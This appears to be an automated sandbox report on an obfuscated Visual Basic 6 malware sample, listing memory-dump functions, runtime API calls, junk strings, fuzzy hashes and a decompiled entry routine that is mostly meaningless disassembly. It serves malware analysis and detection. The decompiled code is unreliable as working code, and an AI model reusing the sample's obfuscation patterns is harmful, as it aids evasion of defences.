Opcode Fuzzy Hash: 077288a4d53e6422a2fec2137836adb575a87520a902d28c4998619161e88f62
Instruction Fuzzy Hash: 87D16575A04349AFDB34EF38E9917EA7BA5EF09350F55402EDC8A9B350C3309991CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 03D163E6, Relevance: 1.5, APIs: 1, Instructions: 42fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,3C337CE0,8074793F), ref: 03D16509

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 096b421473a0ced81915601dbd39445467183356ed5d32e4986991d6fc0de689
Instruction ID: 64c27d8e7d26e56b7b6d6825adf16bc091a1823ef6ff44f12bd833ca6a56cc9e
Opcode Fuzzy Hash: 096b421473a0ced81915601dbd39445467183356ed5d32e4986991d6fc0de689
Instruction Fuzzy Hash: 1511CE72815264EBCB64AE75CC49AEABBE1FF94311F02890CDCD9A3618D3345A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03D17601, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03D1760F

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 884aaac2c3113bd68c80b0c9bef4a453850a65f9ae1f578860e7dc27d60fe45b
Instruction ID: 3adcea6774b7fe34f5f6c9e9b3bf41d615a5711f068902ab2f06d54384fe08f4
Opcode Fuzzy Hash: 884aaac2c3113bd68c80b0c9bef4a453850a65f9ae1f578860e7dc27d60fe45b
Instruction Fuzzy Hash: B0B012D100E2C909C343E2700C341083E142A5315178A80C78090C5057DF480169BBE3

Uniqueness

Uniqueness Score: -1.00%

Function 03D1B6B4, Relevance: 1.4, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

-9m, xrefs: 03D10A25

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID: -9m
API String ID: 0-642598042
Opcode ID: 4d0a87209548190404694a1f406fe26cb76c4548bb262fbc686c4a9f298352de
Instruction ID: b318aee563ce08ef6ab7786ed573ef47c6782a6c404ba5aef454966703663400
Opcode Fuzzy Hash: 4d0a87209548190404694a1f406fe26cb76c4548bb262fbc686c4a9f298352de
Instruction Fuzzy Hash: 3361A875600308AFDB24EF35E9907EA7BA1EF49340F96406EDC8A9B350C374C981CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03D107D1, Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

-9m, xrefs: 03D10A25

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID: -9m
API String ID: 0-642598042
Opcode ID: bc7088c890e7c2c3a7c6789b2f61c40564d4c6bdb94ee6625c1a28afa06d9b6d
Instruction ID: 6e9a524e7cf3702df2a48d795faf4ea7b71f67c835be96f950d7173e7036d2b0
Opcode Fuzzy Hash: bc7088c890e7c2c3a7c6789b2f61c40564d4c6bdb94ee6625c1a28afa06d9b6d
Instruction Fuzzy Hash: 24516430A89389DFEB24AF34D451AEABBB0FF45744F49452ECCCA9B250C3308992CB44

Uniqueness

Uniqueness Score: -1.00%

Function 03D1B3EA, Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

-9m, xrefs: 03D10A25

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID: -9m
API String ID: 0-642598042
Opcode ID: 6699a34ce7c59f2c7696c2084d91b8baaba28c5eae6cbcbc36b283ab1aa03880
Instruction ID: 5f19b03b76df3da57038642ec6ac7a278dc21cbcab12223d8f8499a0c367bdac
Opcode Fuzzy Hash: 6699a34ce7c59f2c7696c2084d91b8baaba28c5eae6cbcbc36b283ab1aa03880
Instruction Fuzzy Hash: 2151697AA443899FEB30EF3499507EA77A1EF5A340F89002EDC8E9B350D3748A81C755

Uniqueness

Uniqueness Score: -1.00%

Function 03D108E5, Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

-9m, xrefs: 03D10A25

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: -9m
API String ID: 1029625771-642598042
Opcode ID: ef9c8f885f2294ea95ddfc2a730f71eea01ad0ce1f90e30cfb90c7528cd986a4
Instruction ID: e1e37f5cc518b0cccb25f4a50c64c02dee6c89ed319d6c00c1c08e6cb8aa36a6
Opcode Fuzzy Hash: ef9c8f885f2294ea95ddfc2a730f71eea01ad0ce1f90e30cfb90c7528cd986a4
Instruction Fuzzy Hash: AC41673568934DABEB249F249962BEAB7B1FF44744F45446ECC8B9B340C3308952CB44

Uniqueness

Uniqueness Score: -1.00%

Function 004028B8, Relevance: 1.3, Strings: 1, Instructions: 8COMMON

Download Yara Rule

Strings

8(@, xrefs: 004028C3

Memory Dump Source

Source File: 00000001.00000002.602791811.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.602774650.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.602822633.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.602829141.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 8(@
API String ID: 0-4273504768
Opcode ID: ec90bbc8e0cf75786467fb288fcf080d05133c2765a6796d0a40c18bbb0dbeb7
Instruction ID: b90f873d7c7238a917e7893ed8aac0e0f8853dec7cb3a8ee4239906e0130a0b5
Opcode Fuzzy Hash: ec90bbc8e0cf75786467fb288fcf080d05133c2765a6796d0a40c18bbb0dbeb7
Instruction Fuzzy Hash: 91B012293A4102BBF220A2A44E06E312380E6483C0378CD77F404F11D0CBFCCC02413D

Uniqueness

Uniqueness Score: -1.00%

Function 00416C20, Relevance: 246.6, APIs: 121, Strings: 19, Instructions: 1564COMMON

Download Yara Rule

APIs

__vbaAryConstruct2.MSVBVM60(?,00402CEC,00000002), ref: 00416D42
#591.MSVBVM60(00000002), ref: 00416D63
__vbaStrMove.MSVBVM60 ref: 00416D71
__vbaStrCat.MSVBVM60(00402AAC,Inte,00000000), ref: 00416D88
__vbaStrMove.MSVBVM60 ref: 00416D92
__vbaStrCat.MSVBVM60(00402AB4,00000000), ref: 00416D9E
__vbaStrMove.MSVBVM60 ref: 00416DA8
__vbaStrCat.MSVBVM60(00402ABC,00000000), ref: 00416DB4
__vbaStrMove.MSVBVM60 ref: 00416DBE
__vbaStrCmp.MSVBVM60(00000000), ref: 00416DC5
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 00416DF3
__vbaFreeVar.MSVBVM60 ref: 00416E02
#535.MSVBVM60 ref: 00416E11
#554.MSVBVM60 ref: 00416E19
#648.MSVBVM60(0000000A), ref: 00416E3A
__vbaFreeVar.MSVBVM60 ref: 00416E46
_adj_fdiv_m64.MSVBVM60(425C0000), ref: 00416E76
__vbaFpI4.MSVBVM60(43530000,?,425C0000), ref: 00416EA0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402764,000002C0,?,425C0000), ref: 00416ED4
__vbaVarDup.MSVBVM60(?,425C0000), ref: 00416EFA
#645.MSVBVM60(00000002,00000000), ref: 00416F08
__vbaStrMove.MSVBVM60(?,425C0000), ref: 00416F16
__vbaFreeVar.MSVBVM60(?,425C0000), ref: 00416F28
__vbaSetSystemError.MSVBVM60(00000000), ref: 00416F36
#554.MSVBVM60(?,425C0000), ref: 00416F4F
#648.MSVBVM60(0000000A), ref: 00416F70
__vbaFreeVar.MSVBVM60(?,425C0000), ref: 00416F7C
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 00416F90
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 00416FB8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402B28,0000013C), ref: 00417022
__vbaFreeObj.MSVBVM60 ref: 0041702E
__vbaVarDup.MSVBVM60 ref: 00417082
#595.MSVBVM60(0000000A,00000000,?,?,?), ref: 004170A5
__vbaFreeVarList.MSVBVM60(00000004,0000000A,?,?,?), ref: 004170C9
__vbaSetSystemError.MSVBVM60 ref: 004170E0
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,000000E3,00000000), ref: 0041710B
__vbaGenerateBoundsError.MSVBVM60 ref: 0041712B
__vbaGenerateBoundsError.MSVBVM60 ref: 00417138
__vbaGenerateBoundsError.MSVBVM60 ref: 00417162
__vbaGenerateBoundsError.MSVBVM60 ref: 0041716F
__vbaGenerateBoundsError.MSVBVM60 ref: 00417199
__vbaGenerateBoundsError.MSVBVM60 ref: 004171A6
__vbaGenerateBoundsError.MSVBVM60 ref: 004171D0
__vbaGenerateBoundsError.MSVBVM60 ref: 004171DD
__vbaGenerateBoundsError.MSVBVM60 ref: 00417207
__vbaGenerateBoundsError.MSVBVM60 ref: 00417214
__vbaGenerateBoundsError.MSVBVM60 ref: 0041723E
__vbaGenerateBoundsError.MSVBVM60 ref: 0041724B
__vbaGenerateBoundsError.MSVBVM60 ref: 00417275
__vbaGenerateBoundsError.MSVBVM60 ref: 00417282
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 004172A4
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 004172CC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402B28,000000C8), ref: 004172FC
__vbaFreeObj.MSVBVM60 ref: 00417308
#705.MSVBVM60(00000002,00000000), ref: 0041732A
__vbaStrMove.MSVBVM60 ref: 0041733B
__vbaFreeVar.MSVBVM60 ref: 00417343
__vbaVarDup.MSVBVM60 ref: 004173BB
#596.MSVBVM60(00000002,?,?,?,?,?,?), ref: 004173F2
__vbaStrMove.MSVBVM60 ref: 00417400
__vbaFreeVarList.MSVBVM60(00000007,00000002,?,?,?,?,?,?), ref: 00417435
__vbaStrToAnsi.MSVBVM60(?,splurge,00000000), ref: 00417451
__vbaStrToAnsi.MSVBVM60(?,Udskylningen8,00000000,00000000), ref: 00417461
__vbaSetSystemError.MSVBVM60(00000000,00000000,00000000), ref: 00417471
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041749B
__vbaOnError.MSVBVM60(00000000), ref: 00417FB2
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 00417FCA
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 00417FF2
__vbaHresultCheckObj.MSVBVM60(00000000,00006878,00402B28,00000140), ref: 00418022
__vbaFreeObj.MSVBVM60 ref: 0041802E
#571.MSVBVM60(000000A7), ref: 00418039
__vbaSetSystemError.MSVBVM60(00000000), ref: 00418045
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402794,000006F8), ref: 0041807A
__vbaStrCopy.MSVBVM60 ref: 00418117
__vbaFreeStr.MSVBVM60 ref: 00418171
__vbaStrCopy.MSVBVM60 ref: 00418182
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402794,000006FC), ref: 004181E9
__vbaFreeStr.MSVBVM60 ref: 004181F5
__vbaStrCopy.MSVBVM60 ref: 0041822E
__vbaFreeStr.MSVBVM60 ref: 00418283
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402764,000002B4), ref: 004182A4
__vbaVarForInit.MSVBVM60(?,?,?,?,00000003,00000008), ref: 00418306
__vbaVarForNext.MSVBVM60(?,?,?), ref: 00418328
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402794,00000700), ref: 00418345
__vbaStrToAnsi.MSVBVM60(?,Saturnale,007C533E), ref: 0041835C
__vbaSetSystemError.MSVBVM60(00000000), ref: 0041836E
__vbaFreeStr.MSVBVM60 ref: 0041838E
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 004183AF
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 004183D7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402B28,000000C0), ref: 00418407
__vbaFreeObj.MSVBVM60 ref: 00418413
#535.MSVBVM60 ref: 00418419
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 00418433
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 0041845B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402B28,00000138), ref: 0041848B
__vbaFreeObj.MSVBVM60 ref: 00418497
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402764,00000254), ref: 004184BD
__vbaStrToAnsi.MSVBVM60(?,tenodynia,00564E24,006E96F2), ref: 004184D9
__vbaSetSystemError.MSVBVM60(0020D311,0062033C,00000000), ref: 004184F5
__vbaFreeStr.MSVBVM60 ref: 00418515
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 00418536
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 0041855E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402B28,0000013C), ref: 004185CE
__vbaFreeObj.MSVBVM60 ref: 004185DE
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 004185F6
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 0041861E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402B28,00000078), ref: 00418644
__vbaFreeObj.MSVBVM60 ref: 0041864C
#702.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 00418675
__vbaStrMove.MSVBVM60 ref: 00418680
__vbaFreeVar.MSVBVM60 ref: 0041868C
__vbaLateMemCall.MSVBVM60(?,O23LzRvYz94dcuxxifrC105,00000003), ref: 00418725
__vbaFreeVarList.MSVBVM60(00000002,?,?,00418817), ref: 004187B9
__vbaFreeVar.MSVBVM60 ref: 004187C5
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 004187D8
__vbaFreeStr.MSVBVM60 ref: 004187E3
__vbaAryDestruct.MSVBVM60(00000000,005FFFC2), ref: 004187F6
__vbaFreeObj.MSVBVM60 ref: 004187FB
__vbaFreeStr.MSVBVM60 ref: 00418804
__vbaFreeStr.MSVBVM60 ref: 0041880C
__vbaFreeStr.MSVBVM60 ref: 00418814

Strings

tenodynia, xrefs: 004184CD
Incarnant, xrefs: 00417062
HYPASPIST, xrefs: 00416EDA
Inte, xrefs: 00416D78
Saturnale, xrefs: 00418350
Grnseegnes, xrefs: 004186A6
hjlpeklassens, xrefs: 00416FFE
Nubia, xrefs: 00418106
LETTERFORM, xrefs: 004180E2
Betyngedes8, xrefs: 00418223
Paw7, xrefs: 00418254
splurge, xrefs: 0041743F
SLEEVING, xrefs: 00418177
Refuserende, xrefs: 0041739B
Overflyvningens, xrefs: 0041815F
O23LzRvYz94dcuxxifrC105, xrefs: 0041871C
Udskylningen8, xrefs: 00417455
Hemiageusia, xrefs: 0041846D
Macromastia, xrefs: 004185A4

Memory Dump Source

Source File: 00000001.00000002.602791811.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.602774650.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.602822633.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.602829141.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Error$CheckHresult$BoundsGenerate$Move$New2$System$List$Ansi$Copy$#535#554#648Destruct$#571#591#595#596#645#702#705CallConstruct2InitLateNextRedim_adj_fdiv_m64
String ID: Betyngedes8$Grnseegnes$HYPASPIST$Hemiageusia$Incarnant$Inte$LETTERFORM$Macromastia$Nubia$O23LzRvYz94dcuxxifrC105$Overflyvningens$Paw7$Refuserende$SLEEVING$Saturnale$Udskylningen8$hjlpeklassens$splurge$tenodynia
API String ID: 462913989-2394078402
Opcode ID: 15cc3a2722ec8a54bfffd280fa431d9b49633017dd58c4f9e611dab20db11f38
Instruction ID: 6d3d01e8efb19eb75696c7144b3f2a6b6b3a02bcddec4b61f56d7813c9090046
Opcode Fuzzy Hash: 15cc3a2722ec8a54bfffd280fa431d9b49633017dd58c4f9e611dab20db11f38
Instruction Fuzzy Hash: F0F22674E102189BCB14CF94C988BDDFBB1FF48304F1481AAE8196B361DB756986CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0041AB80, Relevance: 168.6, APIs: 89, Strings: 7, Instructions: 605COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041AC05
__vbaAryConstruct2.MSVBVM60(?,00402DF0,00000003), ref: 0041AC16
__vbaStrCat.MSVBVM60(00402D5C,00402D54), ref: 0041AC2C
__vbaStrMove.MSVBVM60 ref: 0041AC39
__vbaStrCat.MSVBVM60(11:1,00000000), ref: 0041AC41
__vbaStrMove.MSVBVM60 ref: 0041AC4B
__vbaStrCat.MSVBVM60(00402D54,00000000), ref: 0041AC53
#547.MSVBVM60(?,?), ref: 0041AC73
__vbaVarTstNe.MSVBVM60(?,?), ref: 0041AC9B
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041ACB1
__vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0041ACC7
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 0041ACEB
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 0041AD19
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402B28,000000E8), ref: 0041AD4A
__vbaStrMove.MSVBVM60 ref: 0041AD55
__vbaFreeObj.MSVBVM60 ref: 0041AD61
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 0041AD79
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 0041ADA1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402B28,00000130), ref: 0041ADCA
__vbaStrMove.MSVBVM60 ref: 0041ADD5
__vbaFreeObj.MSVBVM60 ref: 0041ADE1
#593.MSVBVM60(00000008), ref: 0041AE02
__vbaFreeVar.MSVBVM60 ref: 0041AE10
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 0041AE28
__vbaCastObj.MSVBVM60(?,00402D88,cimbrer), ref: 0041AE44
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041AE52
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000040), ref: 0041AE6C
__vbaFreeObj.MSVBVM60 ref: 0041AE78
__vbaR4Str.MSVBVM60(00402D54), ref: 0041AE89
__vbaStrCat.MSVBVM60(00402D54,19:), ref: 0041AEAA
__vbaStrMove.MSVBVM60 ref: 0041AEB7
__vbaStrCat.MSVBVM60(9:19,00000000), ref: 0041AEBF
__vbaStrMove.MSVBVM60 ref: 0041AEC9
#541.MSVBVM60(00000008,00000000), ref: 0041AED3
__vbaStrVarMove.MSVBVM60(00000008), ref: 0041AEE0
__vbaStrMove.MSVBVM60 ref: 0041AEEB
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041AEFA
__vbaFreeVar.MSVBVM60 ref: 0041AF09
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 0041AF21
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 0041AF4F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402B28,00000068), ref: 0041AF7D
__vbaFreeObj.MSVBVM60 ref: 0041AF85
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 0041AF9D
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 0041AFC5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402B28,000000E0), ref: 0041AFEE
__vbaStrMove.MSVBVM60 ref: 0041AFF9
__vbaFreeObj.MSVBVM60 ref: 0041B005
__vbaVarDup.MSVBVM60 ref: 0041B02B
#600.MSVBVM60(00000008,00000002), ref: 0041B03A
__vbaFreeVar.MSVBVM60 ref: 0041B048
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 0041B060
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 0041B08E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402B28,00000050), ref: 0041B0B9
__vbaStrCmp.MSVBVM60(00000000,?), ref: 0041B0C0
__vbaFreeStr.MSVBVM60 ref: 0041B0D2
__vbaFreeObj.MSVBVM60 ref: 0041B0DE
#703.MSVBVM60(00000008,000000FF,000000FE,000000FE,000000FE), ref: 0041B15F
__vbaStrMove.MSVBVM60 ref: 0041B16A
__vbaFreeVar.MSVBVM60 ref: 0041B176
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 0041B18E
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 0041B1B6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402B28,000000E0), ref: 0041B1DF
__vbaStrMove.MSVBVM60 ref: 0041B1EA
__vbaFreeObj.MSVBVM60 ref: 0041B1F6
__vbaFpI4.MSVBVM60 ref: 0041B207
__vbaHresultCheckObj.MSVBVM60(00000000,001B8FEF,00402764,000002C8), ref: 0041B243
#675.MSVBVM60(00000000,3FF00000,00000000,3FF00000,00000000,3FF00000,00000000,3FF00000,00000008,?), ref: 0041B295
__vbaFpR8.MSVBVM60 ref: 0041B29B
__vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0041B2CC
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 0041B2F0
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 0041B318
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402B28,000000D0), ref: 0041B341
__vbaStrMove.MSVBVM60 ref: 0041B34C
__vbaFreeObj.MSVBVM60 ref: 0041B358
#535.MSVBVM60 ref: 0041B35E
#546.MSVBVM60(00000008), ref: 0041B36D
__vbaVarMove.MSVBVM60 ref: 0041B37C
#580.MSVBVM60(Drikkeautomat3,00000001), ref: 0041B389
__vbaFreeStr.MSVBVM60(0041B441), ref: 0041B3F1
__vbaFreeStr.MSVBVM60 ref: 0041B3F6
__vbaFreeStr.MSVBVM60 ref: 0041B3FB
__vbaFreeVar.MSVBVM60 ref: 0041B400
__vbaFreeStr.MSVBVM60 ref: 0041B409
__vbaFreeStr.MSVBVM60 ref: 0041B40E
__vbaFreeStr.MSVBVM60 ref: 0041B413
__vbaFreeStr.MSVBVM60 ref: 0041B418
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041B42C
__vbaFreeObj.MSVBVM60 ref: 0041B435
__vbaFreeStr.MSVBVM60 ref: 0041B43E

Strings

11:1, xrefs: 0041AC3C
ibolium, xrefs: 0041B017
cimbrer, xrefs: 0041AE39
H.2, xrefs: 0041B0F9
Drikkeautomat3, xrefs: 0041B384
9:19, xrefs: 0041AEBA
19:, xrefs: 0041AEA0

Memory Dump Source

Source File: 00000001.00000002.602791811.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.602774650.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.602822633.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.602829141.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Move$New2$List$#535#541#546#547#580#593#600#675#703CastConstruct2CopyDestruct
String ID: 11:1$19:$9:19$Drikkeautomat3$H.2$cimbrer$ibolium
API String ID: 1210936626-4072088996
Opcode ID: a777c0c8d797738f8de0b22479a1dc35feef47f74b9f8be5cdd3ff736c97f284
Instruction ID: c28e10e24ce2fa07c7102179ee2ac123d636e476588b9befc64a85e58a56f31a
Opcode Fuzzy Hash: a777c0c8d797738f8de0b22479a1dc35feef47f74b9f8be5cdd3ff736c97f284
Instruction Fuzzy Hash: 7D326E71900229ABCB14DF64DD88FDD7B74FB58704F10816AF509B72A0DBB46A89CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004014B4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 15%

			_entry_() {
				signed char _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t49;
				void* _t50;
				void* _t51;
				void* _t54;
				signed int* _t55;
				void* _t58;
				void* _t59;
				signed int _t64;
				void* _t65;
				void* _t68;
				void* _t70;
				intOrPtr _t72;
				signed int _t75;
				signed int _t76;

				_push("VB5!6&*"); // executed
				L004014AC();
				while(1) {
					asm("invalid"); // executed
					 *_t45 =  *_t45 + _t45;
					 *_t45 =  *_t45 + _t45;
					 *_t45 =  *_t45 + _t45;
					 *_t45 =  *_t45 ^ _t45;
					 *_t45 =  *_t45 + _t45;
					_t46 = _t45 + 1;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *((intOrPtr*)(_t65 + 0x39c0b02a)) =  *((intOrPtr*)(_t65 + 0x39c0b02a)) + _t46;
					 *(_t46 - 0x2daa55bc) =  *(_t46 - 0x2daa55bc) ^ 0x00000016;
					asm("adc [bx+si-0x62], dh");
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					_t55 = _t54 + 1;
					 *_t46 =  *_t46 + _t46;
					 *_t55 =  *_t55 | _t46;
					_t64 = _t64 - 1;
					_t65 = _t65 + 1 - 1 + 1;
					_push(_t58);
					_t70 = _t68 + 1 - 1;
					_t54 = _t55 - 1 + 1 - 1;
					_push(_t49);
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					_t49 = _t49 + _t49;
					asm("int3");
					 *_t46 =  *_t46 ^ _t46;
					_t5 = _t46 + 0x72;
					 *_t5 =  *((intOrPtr*)(_t46 + 0x72)) + _t46;
					_t72 =  *_t5;
					if(_t72 < 0) {
						break;
					}
					0x55();
					if(_t72 < 0) {
						L5:
						 *_t46 =  *_t46 + _t46;
						_pop(ss);
						 *_t46 =  *_t46 | _t46;
						 *_t46 =  *_t46 + _t46;
						_t47 = _t46 |  *_t46;
						_t75 = _t47;
						_push(0x75);
						if(_t75 < 0) {
							L17:
							_t49 = _t49 + 1;
							asm("sbb al, 0x0");
							_t59 = _t59 + 2;
							_push(ds);
							 *_t64 =  *_t64 + _t49;
							_push(ds);
							 *_t49 =  *_t49 + _t54;
							_push(ds);
							 *((intOrPtr*)(_t49 + 0x1c)) =  *((intOrPtr*)(_t49 + 0x1c)) + _t47;
							_t50 = _t49 + 1;
							 *((intOrPtr*)(_t50 + _t47 * 2)) =  *((intOrPtr*)(_t50 + _t47 * 2)) + _t50;
							_t51 = _t50 + 1;
							 *((intOrPtr*)(_t51 + 0x43)) =  *((intOrPtr*)(_t51 + 0x43)) + _t47;
							 *((intOrPtr*)(_t59 + 0x49)) =  *((intOrPtr*)(_t59 + 0x49)) + _t47;
							_t43 = _t58 - 0x36ffc400;
							 *_t43 =  *((intOrPtr*)(_t58 - 0x36ffc400)) + _t51 + 1;
							_push(_t65);
							if ( *_t43 != 0) goto L19;
							asm("insb");
							goto [far dword [eax+eax-0x1];
						}
						asm("popad");
						if(_t75 < 0) {
							 *((intOrPtr*)(_t49 + _t47 * 2)) =  *((intOrPtr*)(_t49 + _t47 * 2)) + _t49;
							goto L17;
						}
						if (_t75 >= 0) goto L15;
						break;
					}
					_t68 = _t70 + 2;
					_t45 = _t46 + 1;
					asm("daa");
					asm("adc ch, bh");
					if(_t45 <= 0) {
						continue;
					}
					 *(_t59 - 0x7b6f79b1) =  *(_t59 - 0x7b6f79b1) >> 0xfb;
					asm("enter 0x9718, 0x57");
					_t48 = _t45;
					asm("stosb");
					 *((intOrPtr*)(_t48 - 0x2d)) =  *((intOrPtr*)(_t48 - 0x2d)) + _t48;
					_t46 = _t49 ^  *(_t54 - 0x48ee309a);
					_t49 = _t48;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					asm("sbb al, 0x9");
					goto L5;
				}
				_t64 =  *(_t46 + _t46 + 0xd) * 0x46000b01;
				_t76 = _t64;
			}

0x004014b4
0x004014b9
0x004014bc
0x004014bc
0x004014be
0x004014c0
0x004014c2
0x004014c4
0x004014c6
0x004014c8
0x004014c9
0x004014cb
0x004014cd
0x004014cf
0x004014d5
0x004014dc
0x004014e0
0x004014e2
0x004014e4
0x004014e6
0x004014e8
0x004014ea
0x004014eb
0x004014ed
0x004014f4
0x004014f5
0x004014f6
0x004014f8
0x004014f9
0x004014fa
0x004014fb
0x004014fd
0x004014ff
0x00401501
0x00401503
0x00401505
0x00401506
0x00401508
0x00401508
0x00401508
0x0040150b
